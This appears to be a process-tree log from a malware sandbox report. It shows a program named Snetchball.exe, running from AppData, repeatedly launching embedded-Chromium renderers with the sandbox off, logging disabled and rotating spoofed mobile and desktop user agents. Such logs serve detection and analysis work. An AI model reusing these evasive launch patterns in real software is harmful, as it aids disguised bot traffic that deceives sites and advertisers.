C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"76⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"76⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3488 --field-trial-handle=2784,i,12800969876586663181,9837050739271468903,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:175⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=2784,i,12800969876586663181,9837050739271468903,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:175⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"74⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"74⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"74⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"74⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"74⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"73⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"73⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"73⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"73⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"73⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4132 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:172⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"71⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"71⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"71⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"71⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"70⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"70⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"70⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"70⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"70⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3872 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1176 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2560 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3928 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3884 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3948 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:869⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"68⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"68⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"68⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"68⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"68⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"67⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"67⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"67⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"67⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"67⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4204 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:166⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"65⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"65⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"65⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"65⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"65⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"64⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"64⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"64⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"64⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"64⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2844,i,5593826838233693096,14758408762258796311,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:163⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=2844,i,5593826838233693096,14758408762258796311,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:163⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"62⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"62⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"62⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"62⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"61⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"61⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"61⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"61⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"61⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2784,i,7886968051460229149,10373124248802330214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:160⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=2784,i,7886968051460229149,10373124248802330214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:160⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"59⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"59⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"59⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"59⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"59⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"58⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"58⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"58⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"58⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"58⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=2092,i,10523724659979098097,11572190020435525926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:157⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4236 --field-trial-handle=2092,i,10523724659979098097,11572190020435525926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:157⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"56⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"56⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"56⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"56⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"56⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"55⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"55⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"55⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"55⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"55⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2784,i,18214678490662489403,16547540043955827226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:154⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4220 --field-trial-handle=2784,i,18214678490662489403,16547540043955827226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:154⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"53⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"53⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"53⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"53⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"52⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"52⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"52⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"52⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"52⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=2776,i,11826410112999658371,10067520919232495530,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:151⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4232 --field-trial-handle=2776,i,11826410112999658371,10067520919232495530,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:151⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"50⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"50⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"50⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"50⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"49⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"49⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"49⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"49⤵
-
-
-
